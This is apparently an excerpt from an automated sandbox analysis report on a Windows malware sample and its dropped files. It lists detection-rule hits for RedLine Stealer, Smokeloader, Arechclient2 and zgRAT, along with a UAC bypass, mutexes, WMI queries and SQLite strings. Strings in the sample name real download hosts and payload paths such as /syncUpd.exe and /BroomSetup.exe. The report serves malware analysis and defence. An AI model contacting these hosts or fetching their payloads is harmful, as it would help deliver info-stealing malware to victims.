Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: String function: 6C4209D0 appears 121 times
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: String function: 04321D46 appears 39 times
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: String function: 004275A4 appears 43 times
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: String function: 0434780B appears 43 times
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: String function: 04321BE3 appears 40 times
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: String function: 04329F27 appears 48 times
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: String function: 043236F8 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: String function: 00801310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: String function: 00801900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: String function: 008014F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: String function: 6C924701 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: String function: 00989D36 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: String function: 6C926320 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Code function: String function: 00801930 appears 76 times

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 1476

Source: zLwT7vCojz.exe, 00000000.00000002.1558401422.0000000004409000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFires( vs zLwT7vCojz.exe
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBCClipboard.exe> vs zLwT7vCojz.exe
Source: zLwT7vCojz.exe, 00000000.00000002.1557905240.0000000004047000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs zLwT7vCojz.exe
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs zLwT7vCojz.exe
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs zLwT7vCojz.exe
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs zLwT7vCojz.exe
Source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005ECA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFires( vs zLwT7vCojz.exe
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs zLwT7vCojz.exe

Source: zLwT7vCojz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 22.2.cmd.exe.52f0e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.cmd.exe.52f0264.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.UniversalInstaller.exe.43e9d5b.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.UniversalInstaller.exe.3e3015b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.cmd.exe.54dd976.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 22.2.cmd.exe.52ac976.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 31.2.cmd.exe.5521e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.UniversalInstaller.exe.43e915b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.UniversalInstaller.exe.36f286d.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.UniversalInstaller.exe.373615b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.cmd.exe.5521264.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.UniversalInstaller.exe.3e30d5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.UniversalInstaller.exe.3736d5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 30.2.UniversalInstaller.exe.3dec86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.UniversalInstaller.exe.43a586d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.1687815536.000000000406C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@26/89@5/7

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Code function: 10_2_6C257030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

10_2_6C257030

Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

Code function: 18_2_0083D660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

18_2_0083D660

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Code function: 0_2_043AD8CE CreateToolhelp32Snapshot,Module32First,

0_2_043AD8CE

Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

Code function: 18_2_00818040 LoadResource,LockResource,SizeofResource,

18_2_00818040

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5496
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3912
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Mutant created: \Sessions\1\BaseNamedObjects\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

File created: C:\Users\user~1\AppData\Local\Temp\u48o.0.exe

Jump to behavior

Source: Yara match	File source: 14.0.u48o.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.1354291806.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1362288506.0000000006B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u48o.1.exe, type: DROPPED

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: one	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: one	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: two	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: two	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: three	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: three	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: four	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: four	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: five	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: five	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: six	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: six	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: seven	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: seven	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: eight	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: eight	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: nine	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: nine	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: ten	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: ten	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: one	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: two	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: three	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: four	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: five	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: six	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: seven	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: eight	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: nine	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: ten	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.90	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.90	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.90	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: Installed	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: Installed	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.59	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.59	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /syncUpd.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /syncUpd.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.59	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /syncUpd.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /1/Qg_Appv5.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /1/Qg_Appv5.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /1/Qg_Appv5.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: Qg_Appv5.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: Qg_Appv5.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /BroomSetup.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /BroomSetup.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /BroomSetup.exe	0_2_00424B3E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: @	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: one	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: one	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: two	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: two	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: five	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: five	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: seven	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: seven	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: eight	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: eight	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: nine	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: nine	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: ten	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: ten	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.90	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.90	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.90	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: Installed	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: Installed	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.59	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.59	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /syncUpd.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /syncUpd.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.59	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /syncUpd.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /1/Qg_Appv5.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /1/Qg_Appv5.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /1/Qg_Appv5.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: Qg_Appv5.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: Qg_Appv5.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /BroomSetup.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /BroomSetup.exe	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: 185.172.128.228	0_2_04344DA5
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Command line argument: /BroomSetup.exe	0_2_04344DA5

Source: zLwT7vCojz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u48o.0.exe, u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1715925938.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
